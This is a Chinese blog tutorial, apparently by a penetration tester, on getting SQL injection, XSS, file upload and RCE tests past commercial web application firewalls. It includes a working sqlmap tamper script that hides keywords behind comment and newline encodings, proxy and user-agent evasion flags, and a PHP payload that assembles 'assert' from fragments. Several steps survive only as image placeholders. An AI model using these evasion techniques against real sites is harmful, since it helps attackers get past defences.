type
status
date
slug
summary
tags
category
icon
password

0x00 简介

当我对对象检测,已经检测到存在sql注入,文件上传或者RCE等漏洞的时候,发现验证漏洞的存在,被waf拦截,无法验证漏洞,这里总结sqlmap的注入绕过,xss工具使用的绕过,文件上传的思路,以及RCE命令执行的命令写法绕过safedog,BT,aliyun

0x01 绕过思路

1)sqlmap绕过思路
cc绕过:
cc绕过:使用代理扫描:--proxy="http://代理IP:端口"
payload变异绕过思路:
指的是当我们以及确定存在注入,我们尝试去手工注入验证查看回显时候,输入的sql注入语句被拦截,我们需要在sqlmap里面编写payload脚本,达到替换绕过
下面是payload变异的演示:
调用内联注释方法  #,/**/,/*!*/三者的区别,/*!*/可实现注释内函数生效
与注释换行绕过:%23a%0a
notion image
根据可绕过编写python插件,再结合sqlmap工具调用插件实现绕过
#!/usr/bin/env python
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.HIGH
def tamper(payload, **kwargs):
retVal = ""
if payload:
payload = payload.replace("union","%23a%0aunion")
payload = payload.replace("select","/*!select*/")
payload = payload.replace("%20","%23a%0a")
payload = payload.replace(" ","%23a%0a")
payload = payload.replace("database()","database%23a%0a()")
return payload
notion image
修改数据头UA绕过思路
自定义头:--user-agent=“头”
自带随机头:--random-agent
2)文件上传绕过思路,这里参照以往的文件上传的各种上传思路做参照实现绕过
举例截断绕过:
notion image
3)xss工具绕过思路
使用xsstrike
xsstrike.py -u "?请求地址" 代理请求--proxy=“” 延迟参数:--timeout
4)RCE绕过思路
函数替换思路:
aaa=$x='asse';$xx='rt';$xxx=$x.$xx;$y=str_replace('x','',' pxhpxinxfo()');$xxx($y);
notion image
加解密函数调用思路:
notion image
请求方式更改绕过思路:
notion image
遇到实际情况可以根据抓取数据包分析,采用人工+工具分析
以上提供思路,无法绕过说明任然有waf规则拦截,需要再寻找方法
WAF绕过-目录扫描-python-expWAF绕过-木马混淆免杀姿势
告白
告白
一个普通的干饭人🍚
公告
type
status
date
slug
summary
tags
category
icon
password
🎉告白的个人日常博客🎉
-- 关注微信公众号 ---
Gaobai文库
本站内存在文章缺失,框架组件问题待解决
原博客kxsy.work文章已在慢慢迁移本站
渗透时长两年半的个人练习生
-- 感谢您的支持 ---
👏欢迎阅览👏